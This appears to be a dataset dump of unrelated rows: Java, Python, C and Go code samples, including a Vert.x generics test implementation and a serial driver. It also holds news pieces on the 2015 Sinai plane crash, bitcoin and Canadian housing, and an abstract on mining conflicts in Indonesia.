content
stringlengths
10
4.9M
/** * @author <a href="mailto:[email protected]">Julien Viet</a> */ public class GenericsTCKImpl implements GenericsTCK { @Override public GenericRefedInterface<Byte> methodWithByteParameterizedReturn() { return methodWithClassTypeParameterizedReturn((byte)123); } @Override public GenericRefedInterface<Short> methodWithShortParameterizedReturn() { return methodWithClassTypeParameterizedReturn((short)1234); } @Override public GenericRefedInterface<Integer> methodWithIntegerParameterizedReturn() { return methodWithClassTypeParameterizedReturn(123456); } @Override public GenericRefedInterface<Long> methodWithLongParameterizedReturn() { return methodWithClassTypeParameterizedReturn(123456789L); } @Override public GenericRefedInterface<Float> methodWithFloatParameterizedReturn() { return methodWithClassTypeParameterizedReturn(0.34F); } @Override public GenericRefedInterface<Double> methodWithDoubleParameterizedReturn() { return methodWithClassTypeParameterizedReturn(0.314D); } @Override public GenericRefedInterface<Boolean> methodWithBooleanParameterizedReturn() { return methodWithClassTypeParameterizedReturn(true); } @Override public GenericRefedInterface<Character> methodWithCharacterParameterizedReturn() { return methodWithClassTypeParameterizedReturn('F'); } @Override public GenericRefedInterface<String> methodWithStringParameterizedReturn() { return methodWithClassTypeParameterizedReturn("zoumbawe"); } @Override public GenericRefedInterface<JsonObject> methodWithJsonObjectParameterizedReturn() { return methodWithClassTypeParameterizedReturn(new JsonObject().put("cheese", "stilton")); } @Override public GenericRefedInterface<JsonArray> methodWithJsonArrayParameterizedReturn() { return methodWithClassTypeParameterizedReturn(new JsonArray().add("cheese").add("stilton")); } @Override public GenericRefedInterface<TestDataObject> methodWithDataObjectParameterizedReturn() { return methodWithClassTypeParameterizedReturn(new TestDataObject().setWibble(3.14).setFoo("foo_value").setBar(123456)); } @Override public GenericRefedInterface<TestEnum> methodWithEnumParameterizedReturn() { return methodWithClassTypeParameterizedReturn(TestEnum.WESTON); } @Override public GenericRefedInterface<TestGenEnum> methodWithGenEnumParameterizedReturn() { return methodWithClassTypeParameterizedReturn(TestGenEnum.LELAND); } @Override public GenericRefedInterface<RefedInterface1> methodWithUserTypeParameterizedReturn() { return methodWithClassTypeParameterizedReturn(new RefedInterface1Impl().setString("foo")); } @Override public void methodWithHandlerByteParameterized(Handler<GenericRefedInterface<Byte>> handler) { handler.handle(methodWithByteParameterizedReturn()); } @Override public void methodWithHandlerShortParameterized(Handler<GenericRefedInterface<Short>> handler) { handler.handle(methodWithShortParameterizedReturn()); } @Override public void methodWithHandlerIntegerParameterized(Handler<GenericRefedInterface<Integer>> handler) { handler.handle(methodWithIntegerParameterizedReturn()); } @Override public void methodWithHandlerLongParameterized(Handler<GenericRefedInterface<Long>> handler) { handler.handle(methodWithLongParameterizedReturn()); } @Override public void methodWithHandlerFloatParameterized(Handler<GenericRefedInterface<Float>> handler) { handler.handle(methodWithFloatParameterizedReturn()); } @Override public void methodWithHandlerDoubleParameterized(Handler<GenericRefedInterface<Double>> handler) { handler.handle(methodWithDoubleParameterizedReturn()); } @Override public void methodWithHandlerBooleanParameterized(Handler<GenericRefedInterface<Boolean>> handler) { handler.handle(methodWithBooleanParameterizedReturn()); } @Override public void methodWithHandlerCharacterParameterized(Handler<GenericRefedInterface<Character>> handler) { handler.handle(methodWithCharacterParameterizedReturn()); } @Override public void methodWithHandlerStringParameterized(Handler<GenericRefedInterface<String>> handler) { handler.handle(methodWithStringParameterizedReturn()); } @Override public void methodWithHandlerJsonObjectParameterized(Handler<GenericRefedInterface<JsonObject>> handler) { handler.handle(methodWithJsonObjectParameterizedReturn()); } @Override public void methodWithHandlerJsonArrayParameterized(Handler<GenericRefedInterface<JsonArray>> handler) { handler.handle(methodWithJsonArrayParameterizedReturn()); } @Override public void methodWithHandlerDataObjectParameterized(Handler<GenericRefedInterface<TestDataObject>> handler) { handler.handle(methodWithDataObjectParameterizedReturn()); } @Override public void methodWithHandlerEnumParameterized(Handler<GenericRefedInterface<TestEnum>> handler) { handler.handle(methodWithEnumParameterizedReturn()); } @Override public void methodWithHandlerGenEnumParameterized(Handler<GenericRefedInterface<TestGenEnum>> handler) { handler.handle(methodWithGenEnumParameterizedReturn()); } @Override public void methodWithHandlerUserTypeParameterized(Handler<GenericRefedInterface<RefedInterface1>> handler) { handler.handle(methodWithUserTypeParameterizedReturn()); } @Override public void methodWithHandlerAsyncResultByteParameterized(Handler<AsyncResult<GenericRefedInterface<Byte>>> handler) { handler.handle(Future.succeededFuture(methodWithByteParameterizedReturn())); } @Override public void methodWithHandlerAsyncResultShortParameterized(Handler<AsyncResult<GenericRefedInterface<Short>>> handler) { handler.handle(Future.succeededFuture(methodWithShortParameterizedReturn())); } @Override public void methodWithHandlerAsyncResultIntegerParameterized(Handler<AsyncResult<GenericRefedInterface<Integer>>> handler) { handler.handle(Future.succeededFuture(methodWithIntegerParameterizedReturn())); } @Override public void methodWithHandlerAsyncResultLongParameterized(Handler<AsyncResult<GenericRefedInterface<Long>>> handler) { handler.handle(Future.succeededFuture(methodWithLongParameterizedReturn())); } @Override public void methodWithHandlerAsyncResultFloatParameterized(Handler<AsyncResult<GenericRefedInterface<Float>>> handler) { handler.handle(Future.succeededFuture(methodWithFloatParameterizedReturn())); } @Override public void methodWithHandlerAsyncResultDoubleParameterized(Handler<AsyncResult<GenericRefedInterface<Double>>> handler) { handler.handle(Future.succeededFuture(methodWithDoubleParameterizedReturn())); } @Override public void methodWithHandlerAsyncResultBooleanParameterized(Handler<AsyncResult<GenericRefedInterface<Boolean>>> handler) { handler.handle(Future.succeededFuture(methodWithBooleanParameterizedReturn())); } @Override public void methodWithHandlerAsyncResultCharacterParameterized(Handler<AsyncResult<GenericRefedInterface<Character>>> handler) { handler.handle(Future.succeededFuture(methodWithCharacterParameterizedReturn())); } @Override public void methodWithHandlerAsyncResultStringParameterized(Handler<AsyncResult<GenericRefedInterface<String>>> handler) { handler.handle(Future.succeededFuture(methodWithStringParameterizedReturn())); } @Override public void methodWithHandlerAsyncResultJsonObjectParameterized(Handler<AsyncResult<GenericRefedInterface<JsonObject>>> handler) { handler.handle(Future.succeededFuture(methodWithJsonObjectParameterizedReturn())); } @Override public void methodWithHandlerAsyncResultJsonArrayParameterized(Handler<AsyncResult<GenericRefedInterface<JsonArray>>> handler) { handler.handle(Future.succeededFuture(methodWithJsonArrayParameterizedReturn())); } @Override public void methodWithHandlerAsyncResultDataObjectParameterized(Handler<AsyncResult<GenericRefedInterface<TestDataObject>>> handler) { handler.handle(Future.succeededFuture(methodWithDataObjectParameterizedReturn())); } @Override public void methodWithHandlerAsyncResultEnumParameterized(Handler<AsyncResult<GenericRefedInterface<TestEnum>>> handler) { handler.handle(Future.succeededFuture(methodWithEnumParameterizedReturn())); } @Override public void methodWithHandlerAsyncResultGenEnumParameterized(Handler<AsyncResult<GenericRefedInterface<TestGenEnum>>> handler) { handler.handle(Future.succeededFuture(methodWithGenEnumParameterizedReturn())); } @Override public void methodWithHandlerAsyncResultUserTypeParameterized(Handler<AsyncResult<GenericRefedInterface<RefedInterface1>>> handler) { handler.handle(Future.succeededFuture(methodWithUserTypeParameterizedReturn())); } @Override public void methodWithFunctionParamByteParameterized(Function<GenericRefedInterface<Byte>, String> handler) { handler.apply(methodWithByteParameterizedReturn()); } @Override public void methodWithFunctionParamShortParameterized(Function<GenericRefedInterface<Short>, String> handler) { handler.apply(methodWithShortParameterizedReturn()); } @Override public void methodWithFunctionParamIntegerParameterized(Function<GenericRefedInterface<Integer>, String> handler) { handler.apply(methodWithIntegerParameterizedReturn()); } @Override public void methodWithFunctionParamLongParameterized(Function<GenericRefedInterface<Long>, String> handler) { handler.apply(methodWithLongParameterizedReturn()); } @Override public void methodWithFunctionParamFloatParameterized(Function<GenericRefedInterface<Float>, String> handler) { handler.apply(methodWithFloatParameterizedReturn()); } @Override public void methodWithFunctionParamDoubleParameterized(Function<GenericRefedInterface<Double>, String> handler) { handler.apply(methodWithDoubleParameterizedReturn()); } @Override public void methodWithFunctionParamBooleanParameterized(Function<GenericRefedInterface<Boolean>, String> handler) { handler.apply(methodWithBooleanParameterizedReturn()); } @Override public void methodWithFunctionParamCharacterParameterized(Function<GenericRefedInterface<Character>, String> handler) { handler.apply(methodWithCharacterParameterizedReturn()); } @Override public void methodWithFunctionParamStringParameterized(Function<GenericRefedInterface<String>, String> handler) { handler.apply(methodWithStringParameterizedReturn()); } @Override public void methodWithFunctionParamJsonObjectParameterized(Function<GenericRefedInterface<JsonObject>, String> handler) { handler.apply(methodWithJsonObjectParameterizedReturn()); } @Override public void methodWithFunctionParamJsonArrayParameterized(Function<GenericRefedInterface<JsonArray>, String> handler) { handler.apply(methodWithJsonArrayParameterizedReturn()); } @Override public void methodWithFunctionParamDataObjectParameterized(Function<GenericRefedInterface<TestDataObject>, String> handler) { handler.apply(methodWithDataObjectParameterizedReturn()); } @Override public void methodWithFunctionParamEnumParameterized(Function<GenericRefedInterface<TestEnum>, String> handler) { handler.apply(methodWithEnumParameterizedReturn()); } @Override public void methodWithFunctionParamGenEnumParameterized(Function<GenericRefedInterface<TestGenEnum>, String> handler) { handler.apply(methodWithGenEnumParameterizedReturn()); } @Override public void methodWithFunctionParamUserTypeParameterized(Function<GenericRefedInterface<RefedInterface1>, String> handler) { handler.apply(methodWithUserTypeParameterizedReturn()); } @Override public <U> GenericRefedInterface<U> methodWithClassTypeParameterizedReturn(Class<U> type) { if (type == Byte.class) { return (GenericRefedInterface<U>) methodWithByteParameterizedReturn(); } if (type == Short.class) { return (GenericRefedInterface<U>) methodWithShortParameterizedReturn(); } if (type == Integer.class) { return (GenericRefedInterface<U>) methodWithIntegerParameterizedReturn(); } if (type == Long.class) { return (GenericRefedInterface<U>) methodWithLongParameterizedReturn(); } if (type == Float.class) { return (GenericRefedInterface<U>) methodWithFloatParameterizedReturn(); } if (type == Double.class) { return (GenericRefedInterface<U>) methodWithDoubleParameterizedReturn(); } if (type == Boolean.class) { return (GenericRefedInterface<U>) methodWithBooleanParameterizedReturn(); } if (type == Character.class) { return (GenericRefedInterface<U>) methodWithCharacterParameterizedReturn(); } if (type == String.class) { return (GenericRefedInterface<U>) methodWithStringParameterizedReturn(); } if (type == JsonObject.class) { return (GenericRefedInterface<U>) methodWithJsonObjectParameterizedReturn(); } if (type == JsonArray.class) { return (GenericRefedInterface<U>) methodWithJsonArrayParameterizedReturn(); } if (type == TestDataObject.class) { return (GenericRefedInterface<U>) methodWithDataObjectParameterizedReturn(); } if (type == TestEnum.class) { return (GenericRefedInterface<U>) methodWithEnumParameterizedReturn(); } if (type == TestGenEnum.class) { return (GenericRefedInterface<U>) methodWithGenEnumParameterizedReturn(); } if (type == RefedInterface1.class) { return (GenericRefedInterface<U>) methodWithUserTypeParameterizedReturn(); } throw new AssertionError("Unexpected type " + type); } @Override public <U> U methodWithClassTypeReturn(Class<U> type) { return methodWithClassTypeParameterizedReturn(type).getValue(); } @Override public <U> void methodWithClassTypeParam(Class<U> type, U u) { GenericRefedInterface<U> gen = methodWithClassTypeParameterizedReturn(type); if (!u.equals(gen.getValue())) { throw new AssertionError("Unexpected value " + u + "/" + u.getClass() + " != " + gen.getValue() + "/" + gen.getValue().getClass()); } } @Override public <U> void methodWithClassTypeHandler(Class<U> type, Handler<U> f) { f.handle(methodWithClassTypeReturn(type)); } @Override public <U> void methodWithClassTypeHandlerAsyncResult(Class<U> type, Handler<AsyncResult<U>> f) { f.handle(Future.succeededFuture(methodWithClassTypeReturn(type))); } @Override public <U> void methodWithClassTypeFunctionParam(Class<U> type, Function<U, String> f) { f.apply(methodWithClassTypeReturn(type)); } @Override public <U> void methodWithClassTypeFunctionReturn(Class<U> type, Function<String, U> f) { methodWithClassTypeParam(type, f.apply("whatever")); } @Override public <U> void methodWithHandlerClassTypeParameterized(Class<U> type, Handler<GenericRefedInterface<U>> handler) { handler.handle(methodWithClassTypeParameterizedReturn(type)); } @Override public <U> void methodWithHandlerAsyncResultClassTypeParameterized(Class<U> type, Handler<AsyncResult<GenericRefedInterface<U>>> handler) { handler.handle(Future.succeededFuture(methodWithClassTypeParameterizedReturn(type))); } @Override public <U> void methodWithFunctionParamClassTypeParameterized(Class<U> type, Function<GenericRefedInterface<U>, String> function) { function.apply(methodWithClassTypeParameterizedReturn(type)); } private <U> GenericRefedInterface<U> methodWithClassTypeParameterizedReturn(U val) { GenericRefedInterfaceImpl<U> obj = new GenericRefedInterfaceImpl<>(); obj.setValue(val); return obj; } @Override public InterfaceWithApiArg interfaceWithApiArg(RefedInterface1 value) { return new InterfaceWithApiArg() { private RefedInterface1 val = value; @Override public void meth() { } @Override public GenericRefedInterface<RefedInterface1> setValue(RefedInterface1 value) { val = value; return this; } @Override public RefedInterface1 getValue() { return val; } }; } @Override public InterfaceWithStringArg interfaceWithStringArg(String value) { return new InterfaceWithStringArg() { private String val = value; @Override public void meth() { } @Override public GenericRefedInterface<String> setValue(String value) { val = value; return this; } @Override public String getValue() { return val; } }; } @Override public <T, U> InterfaceWithVariableArg<T, U> interfaceWithVariableArg(T value1, Class<U> type, U value2) { return new InterfaceWithVariableArg<T, U>() { private T val1 = value1; private U val2 = value2; @Override public void setOtherValue(T value) { val1 = value; } @Override public T getOtherValue() { return val1; } @Override public GenericRefedInterface<U> setValue(U value) { val2 = value; return this; } @Override public U getValue() { return val2; } }; } @Override public GenericNullableRefedInterface<RefedInterface1> methodWithGenericNullableApiReturn(boolean notNull) { return new GenericNullableRefedInterface<RefedInterface1>() { @Override public RefedInterface1 getValue() { return notNull ? new RefedInterface1Impl().setString("the_string_value") : null; } }; } @Override public void methodWithHandlerGenericNullableApi(boolean notNull, Handler<GenericNullableRefedInterface<RefedInterface1>> handler) { handler.handle(methodWithGenericNullableApiReturn(notNull)); } @Override public void methodWithHandlerAsyncResultGenericNullableApi(boolean notNull, Handler<AsyncResult<GenericNullableRefedInterface<RefedInterface1>>> handler) { handler.handle(Future.succeededFuture(methodWithGenericNullableApiReturn(notNull))); } @Override public <T> GenericRefedInterface<T> methodWithParamInferedReturn(GenericRefedInterface<T> param) { return param; } @Override public <T> void methodWithHandlerParamInfered(GenericRefedInterface<T> param, Handler<GenericRefedInterface<T>> handler) { handler.handle(param); } @Override public <T> void methodWithHandlerAsyncResultParamInfered(GenericRefedInterface<T> param, Handler<AsyncResult<GenericRefedInterface<T>>> handler) { handler.handle(Future.succeededFuture(param)); } }
/** * Parses a language tag list. * * @param langs the language tag list to be parsed * * @return a list of language tags parsed from {@code langs}, sorted by descending * <a href="https://developer.mozilla.org/en-US/docs/Glossary/quality_values">quality value</a> * * @throws NullPointerException if {@code langs} is null */ public static List<String> langs(final CharSequence langs) { if ( langs == null ) { throw new NullPointerException("null langs"); } return values(langs, LangPattern); }
def minimax_endgame_search(state, maximize=True) : if type(state) != list: state = [[state]] leaf_node = [] static_eval_count = 0 while state: path = state.pop(0) if path[-1].is_game_over(): score = path[-1].get_endgame_score(maximize) leaf_node.append((path,score,1)) else: children = path[-1].generate_next_states() new_path = [] for child in children: temp_path = path.copy() temp_path.append(child) new_path.append(temp_path) leaf_node.append(minimax_endgame_search(new_path,not maximize)) for leaf in leaf_node: static_eval_count += leaf[2] new_leaf = [] for leaf in leaf_node: new_leaf.append((leaf[0], leaf[1], static_eval_count)) if not maximize: return max(new_leaf, key = lambda leaf:leaf[1]) else: return min(new_leaf, key = lambda leaf:leaf[1])
/* ** Find any duplicates in the arguments and either print an error ** if there is one or create/add another variable option. */ void add_option(t_arg *args, t_opt **options, t_opt *new) { t_opt *opt; if (options && *options && has_duplicates(options, new) && strcmp(new->name, "_unknown")) { fprintf(stderr, "error: Singular option already set [%s]\n", new->name); free_options(options); free_options(&new); free_args(args); exit(EXIT_FAILURE); } if (length_options(options) > 0) { opt = *options; while (opt->next) opt = opt->next; opt->next = new; } else *options = new; }
def _file_fix(self, filepath, prefix=None, suffix=None): with tempfile.NamedTemporaryFile(dir=self.working_path, delete=False) as outfile: if prefix: outfile.write(prefix) shutil.copyfileobj(open(filepath, 'r'), outfile) if suffix: outfile.write(suffix) shutil.move(outfile.name, filepath)
Two days on, no clear explanation for downing of Russian plane over Sinai By Thomas Gaist 3 November 2015 The cause of the destruction of a Russian commercial airliner Saturday over Egypt remains unclear. The plane fell in pieces in the war-torn region of Hasana in northern Sinai, killing all 224 people on board. The jetliner crashed to earth in a state of disintegration, having largely broken up in midair, and scattering debris over a wide area. The Islamic State (IS) affiliate in the Sinai Peninsula claimed responsibility for the attack on Saturday. These claims prompted immediate expressions of skepticism from Egyptian and Russian officials. ISIS is not known to possess anti-aircraft weapons with sufficient range to carry out an attack against a jet flying at cruising altitude, according to officials and experts cited in Western media. Some military analysts have suggested that the available evidence points to a bomb planted inside the plane’s hold, saying that an attack could have been similar to that which destroyed Pan Am 747 over Lockerbie, Scotland in 1988. Some reports in the Russian media have suggested that the plane may have been destroyed by a mechanical failure resulting from poor maintenance, with reports circulating of a pre-flight phone call in which the pilot worried to his wife about the condition of the aircraft. Metrojet, the company servicing the flight, has maintained that the plane was destroyed by some “external” cause, saying that its own investigation has ruled out a mechanical failure as the reason. “We rule out technical fault of the plane or the pilot’s error, the only explainable cause is physical impact on the aircraft,” Metrojet executive Alexander Smirnov said. The company’s claims are predictable, given the immense financial interests at stake. Aviation experts have already criticized Metrojet, however, saying that the company’s claims were advanced far too quickly and without any basis in evidence. “That statement is premature and is based on no real facts,” Alexander Neradko of Russia’s Air Transport Agency told Egyptian media on Monday. “We know that components of the plane have been thrown over a wide area. That says the breakup took place in the air, at a high altitude. But it is very premature to talk about the reasons,” Neradko said. “I am surprised that an airline manager, at the point that we are at in this investigation, would make a statement like that,” said Robert Francis, a former official with the National Transportation Safety Board in the United States. “Without the flight recorders having been read, and without more investigation of the fuselage, which is spread all over the place, I don’t think you can rule out anything,” Francis said. While a number of international carriers have suspended flights over the area, others have not. US-based carrier United Airlines has continued routing flights over the Sinai, saying that the company “sees no need” to stop the flights. Given the timing and the nationality of the jet, coming amidst a major escalation of Russia’s military presence in Syria, an attack on the plane is a definite possibility. Russian actions in Syria have been directed at a number of US-backed terrorist groups, variously affiliated with factions of al Qaeda, that have been built up by Washington as part of efforts to overthrow the government of Bashar al-Assad. These groups have been armed to the teeth by the US and its allies, and have received more advanced weaponry since the onset of Russia’s military campaign in Syria. ISIS is itself an offshoot of the US-backed civil war in Syria. Russian leaders have clearly been concerned to muffle speculation along these lines. Russian President Vladimir Putin called the incident a “great tragedy,” and called for investigators to outline an “objective picture” of the crash. The US government, usually the first to play the terrorist card under these circumstances, has sounded a noticeably more muted tone. On Monday, US Director of National Intelligence James Clapper made remarks downplaying claims that IS militants were behind the incident. “It’s unlikely, but I wouldn’t rule it out. We don’t have any direct evidence of any terrorist involvement, yet,” Clapper said. Whatever its origins, the incident will likely become a further blow against Egypt's tourism sector, which has already contracted by some 20 percent this year. The industry was already reeling from an incident earlier this year, when Mexican tourists who were traveling in a caravan in Egypt’s Western Desert were killed by an Egyptian military helicopter. Please enable JavaScript to view the comments powered by Disqus.
Raj Date, the former Deputy Director of the US Consumer Financial Protection Bureau (CFPB), a consumer finance watchdog, said in an interview this week that he supports – and is now investing in – bitcoin. During a segment of Bloomberg Television’s “Street Smart,” Date commented that, on a personal level, he sees a lot of potential in digital currencies like bitcoin. “The thing I like about innovation in consumer finance, like bitcoin, like digital currency, is exactly the same reason I went to the CFPB. How is it that you can take new ideas and make the system work better for people?” Pros and cons Date currently serves on the board of directors for bitcoin stratup Circle Internet Financial. He is also the founder and managing director of Washington, D.C.-based investment firm Fenway Summer. In the interview, Date said that bitcoin has the potential to deliver faster and more secure payments than is currently possible for most consumers, and remarked that the pace of innovation could result in a broader evolution in digital currencies. Date said: “It’s entirely possible that there will be variants of other digital currencies, entirely possible that the form of bitcoin will continue to be developed and improved over time.” He continued: “The fact of the matter is that anything that actually solves the problems of consumers and merchants is, in my mind, a good thing.” Looking ahead Date also pointed to the evolution of the bitcoin business ecosystem as a positive development. Date held up the example of the liquidation of Mt. Gox as a sign that companies in the space are maturing. He said: “The new firms in this marketplace are considerably more serious-minded, consdierably better financed and take these things seriously.” This industry transition was on display last week at Inside Bitcoins NYC. For more on that event, read our full report. Image via Wikipedia
The Dynamic of Social Relations and Conflicts in Mining Area in Indonesia Study of Mining in Bahodopi of Marowali, Central Sulawesi The study of socio-cultural institutions related to natural resource management includes two factors namely IPSO facto (based on facts) namely management in an area marked by the presence of people who carry out activities and IPSO de jure (based on law) namely management based on legal aspects positive. This article aims to analyze how the socio-cultural principles lived by the community in Bahodopi District, Morowali Regency in response to their lives. The results showed that the dynamics of community life after the entry of the mine in Bahodopi had broad implications related to social life. However, empirically, this study shows that the conflict mechanism that arises is more dominated by conflicts between migrants and local residents, as well as local communities and companies. The number of conflicts raised by the community is a low escalation but has a broad impact on the sustainability and existence of investment management. The interaction of various cultures that have different perspectives is typical even though it has the potential to create conflict and even violence if it is not appropriately managed. Socio-cultural background with a different basis is a trigger for disharmony in the community if it cannot be appropriately managed. The conflict that occurs mainly with the appearance of two ethnic entities facing each other is an irony in the life of a capitalistic character.
/** * This class takes a template string that refers to positional * parameters as well as a sequence of argument values and * returns a string in which the parameter references have been * replaced by actual values. * * The parameter references are 0-based and written as decimal numbers * enclosed by curly braces. * * An {@link IllegalArgumentException} occurs if the template * string contains a negative reference or a reference outside the * bounds of the argument array. This exception type also occurs * on lower-level syntax errors, e.g. if the parameter reference * is not a number or if braces are not properly matched. * * The arguments array reference must not be null even if there is * not a single parameter reference. */ public class StringParameterReplaceUtil { /** * Prevent instantiation. */ private StringParameterReplaceUtil() { } /** * Replaces parameter references in the specified template string and returns the result. * @param template the template string * @param arguments the argument sequence * @return the result */ public static String replace(String template, String... arguments) { /** check for a null argument array **/ if (arguments == null) { throw new IllegalArgumentException("arguments array referece is null"); } /** build the result string **/ StringBuilder resultBuilder = new StringBuilder(); int index = 0; while (true) { int openingBraceIndex = template.indexOf('{', index); int closingBraceIndex = template.indexOf('}', index); /** case: no more parameter references **/ if (openingBraceIndex == -1 && closingBraceIndex == -1) { resultBuilder.append(template, index, template.length()); break; } /** case: mismatched braces (either only opening or only closing brace found) **/ if (openingBraceIndex == -1 || closingBraceIndex == -1) { throw new IllegalArgumentException("invalid template string: [" + template + "]"); } /** case: mismatched braces (they appear in the wrong order) **/ if (openingBraceIndex > closingBraceIndex) { throw new IllegalArgumentException("invalid template string: [" + template + "]"); } /** copy characters up to the opening brace **/ resultBuilder.append(template, index, openingBraceIndex); /** parse the parameter index (may fail if not a number) **/ String parameterReferenceText = template.substring(openingBraceIndex + 1, closingBraceIndex); int parameterIndex; try { parameterIndex = Integer.parseInt(parameterReferenceText); } catch (NumberFormatException e) { throw new IllegalArgumentException("invalid parameter reference [" + parameterReferenceText + "] in template string: [" + template + "]"); } /** make sure the index is within the bounds of the argument array **/ if (parameterIndex < 0 || parameterIndex >= arguments.length) { throw new IllegalArgumentException("parameter index [" + parameterIndex + "] out of bounds; number of arguments: [" + arguments.length + "]"); } /** the reference is valid, so copy the argument and skip the reference **/ resultBuilder.append(arguments[parameterIndex]); index = closingBraceIndex + 1; } return resultBuilder.toString(); } }
// Copyright (c) 2020 Author Name. All rights reserved. // Use of this source code is governed by the Apache License, Version 2.0 // that can be found in the LICENSE file. // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // Copyright (c) 2020 Author Name. All rights reserved. // Use of this source code is governed by the Apache License, Version 2.0 // that can be found in the LICENSE file. package drivers import ( "fmt" //"errors" "io" "log" "github.com/jacobsa/go-serial/serial" ) type serialState struct { Buff [12]byte recvBuff [12]byte start bool discard bool head byte tail byte counter int length int Complete bool err error prevByte byte port io.ReadWriteCloser } // SerialState is the driver object to be used for communicating with // MegaPi control board. var SerialState serialState // OpenOptions are the options object for the serial interface. type OpenOptions = serial.OpenOptions func (s *serialState) Open(options serial.OpenOptions) { s.start = false s.prevByte = 0x00 s.discard = false s.head = 0x00 s.tail = 0x00 s.counter = -1 s.length = 0 s.Complete = false s.Buff = [12]byte{11: 0} s.recvBuff = [12]byte{11: 0} s.port, s.err = serial.Open(options) if s.err != nil { log.Fatalf("port.Open: %v", s.err) } } func (s *serialState) Write(msg [8]byte) (bytesWritten int, err error) { return s.port.Write(msg[:]) } func (s *serialState) Read() (bytesRead int, err error) { var n int for { //fmt.Println("Buffer cycle") tslice := s.recvBuff[:] n, err := s.port.Read(tslice) if err != nil { log.Fatalf("port.Read: %v", err) s.err = err fmt.Printf("error: %v\n", err) } //fmt.Printf("tempbuff: %v, N: %v\n", buff, n) s.parseIncomming(n) if s.Complete == true || s.discard == true { break } } return n, err } func (s *serialState) Result(n int) (buff []byte) { return s.Buff[0:n] } func (s *serialState) Close() { // not yet implemented // s.port.Close() } func (s *serialState) parseIncomming(n int) { for i := 0; i < n; i++ { s.parseSerialByte(s.recvBuff[i]) if s.discard == true { break } } } func (s *serialState) incrementAndStore(recvByte byte) { s.counter++ //fmt.Printf("I&C\n Count: %v, Byte: %v\n", s.counter, recvByte) s.Buff[s.counter] = recvByte } /************************************************** ff 55 len idx ... cr(0d) nl(0a) 0 1 2 3 n n+1 n+2 ***************************************************/ func (s *serialState) parseSerialByte(recvByte byte) { var selected = true var err error //fmt.Printf("P: %v, C: %v\n", s.prevByte, recvByte) switch { // confirm full start sequence case recvByte == 0x55 && s.prevByte == 0xff: s.discard = false s.counter = -1 s.incrementAndStore(s.prevByte) s.Complete = false s.counter = 0 case recvByte == 10 && s.prevByte == 13: //fmt.Printf("Kill\n") selected = false s.counter = -1 // All other bytes default: s.tail = 0 s.head = 0 // register length if s.counter == 2 { s.length = int(recvByte) } else if s.counter == 1 { // register id } else if s.length > 1 { s.length-- } else if s.length == 1 { s.length = 0 s.Complete = true } else { selected = false s.counter = -1 } } if selected == true { s.incrementAndStore(recvByte) if s.Complete == true { s.counter = -1 } } s.prevByte = recvByte s.err = err }
A new real estate forecast for Canada predicts ups and downs ahead in 2017: Vancouver will slump, the GTA will soar, and Alberta should see some recovery after a rocky few years. Real estate in Canada’s largest markets became increasingly unaffordable for many in 2016, and the spectre of a crash loomed. “The price of a home in Canada increased 13.0 per cent year-over-year to $558,153 in the fourth quarter of 2016 – the highest year-over-year national home price increase recorded in over a decade,” stated a Royal LePage forecast released Thursday. Among measures to ease the risk of a shock was B.C.’s new foreign buyers tax and the federal government’s tightening of mortgage lending rules. At the same time, both B.C. and Ontario created new incentives for first time home buyers. Here’s a look at what 2017 has in store for Canadians from coast to coast. Alberta There is light at the end of the tunnel for Alberta home owners dealing with a depressed economy following the oil crash. “While we don’t anticipate a strong housing rebound, we are calling 2016 as the bottom for this correctional phase of the cycle,” said Royal LePage president and CEO Phil Soper in the forecast. The economic improvement is thanks to a rise in oil prices, bolstered by the OPEC agreement to cut production globally. Perhaps surprisingly, the oil slump has not ravaged housing values too badly in Alberta over the last few years, Royal LePage stated, but it has diminished demand. WATCH: Homebuyers and owners brace for rising mortgage rates House prices in Calgary are expected to stabilize this year, the Calgary Real Estate Board (CREB) said Wednesday in its annual forecast. Calgary has had the highest unemployment rate in Canada for six months straight; that needs to change in order to see true growth. “One of the key components to this turnaround in the housing market is if labour market conditions start to improve,” said Ann-Marie Lurie, chief economist at CREB. READ MORE: Why more Chinese investors are buying Calgary real estate “We need to start having job growth in this city before we can see a true shift in our housing market.” Saskatchewan has also taken a hit from low oil prices, however a solid year for agriculture has kept the housing market afloat. “Economic growth in [Saskatchewan] is likely to be positive in 2017, but slightly below the Canadian average, with home prices expected to remain relatively flat in the province’s two largest cities,” Royal LePage predicts. Ontario Ontario has seen incredible growth in recent years, and that’s not expected to change in 2017. The GTA saw a 16.1 per cent year-over-year spike in prices. Some areas around Toronto have seen “Vancouver-like” growth over the last year: Richmond Hill ended 2016 with home values 30 per cent higher than a year before. “There is no relief in sight for the GTA – forward momentum and supporting fundamentals in the region are that strong,” said Soper. With prices increasingly pushing homes beyond reach, first time home buyers are also being shut out of the lower end of the market due to diminishing condo inventory. READ MORE: Here’s how much mortgage payments will go up as banks hike rates While it might seem like condos going up on every corner of Canada’s largest city — they are likely already all sold out, said Brad J. Lamb, president and CEO at Lamb Development and Brad J. Lamb Realty. There are about 670 condos for sale in Toronto this January, compared with 1,450 units last January and 2,200 in January of 2015, Lamb said. WATCH: Nearly half of first-time home buyers, and those looking to upsize, need financial help from family “One of the reason prices went up 17 per cent last year was because there was not enough product to go around and keep the market happy,” said Lamb. Supply has now fallen, year over year, by more than half. “We’re going to have a huge problem in prices this year going up. Last year will look like nothing compared to this year.” Lamb predicts GTA prices will only skyrocket in the coming years. “Our prices will be well in excess of Vancouver’s prices in five years,” said Lamb. “And there’s nothing anybody can do to stop it.” British Columbia B.C. largely dominated the real estate conversation in 2016, and in 2017 the trend will reverse as home values slide. That being said, prices are expected to recede to levels seen in early 2016 — still the highest anywhere in the country. READ MORE: Vancouver home prices to fall as much as 20 per cent: bank “Eroding affordability in B.C.’s Lower Mainland has reached unsustainable ground,” said Soper. “While the cost of a home in Greater Vancouver will remain the highest in the country, a modest price reset will provide much needed relief in the Lower Mainland and help reignite overall buyer activity in the region.” While prices somewhat recede, the general mood isn’t too panicked said Dan Morrison, president of the Real Estate Board of Greater Vancouver. “The fundamentals for Vancouver are still strong — we still have more people moving here than we’re building places for, interest rates are still low, the Canadian dollar is still putting Canada on sale for the rest of the world,” Morisson said. Meanwhile, prices continue to rise in Victoria due to lack of supply. READ MORE: CMHC issues ‘red’ warning for Canada’s housing market “Our economy is one of the best in the country right now,” Victoria real estate board chief Mike Nugent told the Canadian Press Monday. “We’ve got lots of jobs happening in all sectors. That’s attracting everybody.” After a record breaking year in parts of the 